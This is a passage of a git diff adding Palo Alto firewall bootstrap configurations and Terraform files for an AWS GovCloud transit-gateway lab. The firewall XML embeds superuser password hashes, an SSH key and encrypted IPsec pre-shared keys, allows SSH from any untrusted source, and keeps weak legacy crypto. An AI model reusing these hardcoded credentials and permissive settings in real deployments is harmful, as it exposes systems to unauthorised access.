+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.45</translated-address>
+                  </destination-translation>
+                  <to-interface>ethernet1/1</to-interface>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="EW">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>10.0.0.0/8</member>
+                  </source>
+                  <destination>
+                    <member>10.0.0.0/8</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt b/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..6ad1fb1b
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/bootstrap_files/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml b/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml
new file mode 100644
index 00000000..13369f72
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/bootstrap_files2/bootstrap.xml
@@ -0,0 +1,871 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$frspqxow$mYHgnubHD/BO9DTqIU8eP.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$aljwjsru$ZIQ1DURHk0wBmwWTajdFu/</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <ip-address>192.168.102.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>no</accept-dhcp-hostname>
+              <accept-dhcp-domain>no</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-2</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>FW-2</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Allow SSH">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="EW">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                </entry>
+                <entry name="Allow Outbound">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="EW">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>10.0.0.0/8</member>
+                  </source>
+                  <destination>
+                    <member>10.0.0.0/8</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt b/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt
new file mode 100644
index 00000000..6dc97916
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/bootstrap_files2/init-cfg.txt
@@ -0,0 +1,18 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-2
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/TGW-VPC-GovCloud/providers.tf b/aws/TGW-VPC-GovCloud/providers.tf
new file mode 100644
index 00000000..af7b0ba3
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/providers.tf
@@ -0,0 +1,3 @@
+provider "aws" {
+  region     = "${var.aws_region}"
+}
diff --git a/aws/TGW-VPC-GovCloud/tgw.tf b/aws/TGW-VPC-GovCloud/tgw.tf
new file mode 100644
index 00000000..191dce08
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/tgw.tf
@@ -0,0 +1,51 @@
+resource "aws_ec2_transit_gateway" "tgw" {
+  description                     = "Transit Gateway"
+  vpn_ecmp_support                = "enable"
+  default_route_table_association = "disable"
+  default_route_table_propagation = "disable"
+  dns_support                     = "enable"
+  auto_accept_shared_attachments  = "disable"
+
+  tags {
+    Name = "transit_gateway"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table" "tgw_security" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-security"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route_table" "tgw_spokes" {
+  transit_gateway_id = "${aws_ec2_transit_gateway.tgw.id}"
+
+  tags {
+    Name = "tgw-rtb-spokes"
+  }
+}
+
+resource "aws_ec2_transit_gateway_route" "default" {
+  destination_cidr_block         = "0.0.0.0/0"
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_spokes.id}"
+}
+
+resource "aws_ec2_transit_gateway_route_table_association" "vpc_security" {
+  transit_gateway_attachment_id  = "${aws_ec2_transit_gateway_vpc_attachment.tgw_security.id}"
+  transit_gateway_route_table_id = "${aws_ec2_transit_gateway_route_table.tgw_security.id}"
+}
+
+resource "aws_ec2_transit_gateway_vpc_attachment" "tgw_security" {
+  vpc_id                                          = "${aws_vpc.vpc_security.id}"
+  subnet_ids                                      = ["${aws_subnet.vpc_security_tgw_1.id}", "${aws_subnet.vpc_security_tgw_2.id}"]
+  transit_gateway_id                              = "${aws_ec2_transit_gateway.tgw.id}"
+  transit_gateway_default_route_table_association = false
+  transit_gateway_default_route_table_propagation = false
+
+  tags {
+    Name = "tgw_attachment_security"
+  }
+}
diff --git a/aws/TGW-VPC-GovCloud/variables.tf b/aws/TGW-VPC-GovCloud/variables.tf
new file mode 100644
index 00000000..75faedb0
--- /dev/null
+++ b/aws/TGW-VPC-GovCloud/variables.tf
@@ -0,0 +1,134 @@
+//This section should be verified and modified accordingly.
+variable aws_region {
+  description = "AWS Region for deployment"
+  default     = "us-gov-west-1"
+}
+
+variable aws_key {
+  description = "aws_key"
+  default     = "AWS-Lab-Pair"
+}
+
+//Do not create these.  The Terraform will do that.  Just need to make secure
+//the s3 bucket names are unique.
+
+variable bootstrap_s3bucket {
+  description = "S3 Bucket Name used to Bootstrap the NGFWs"
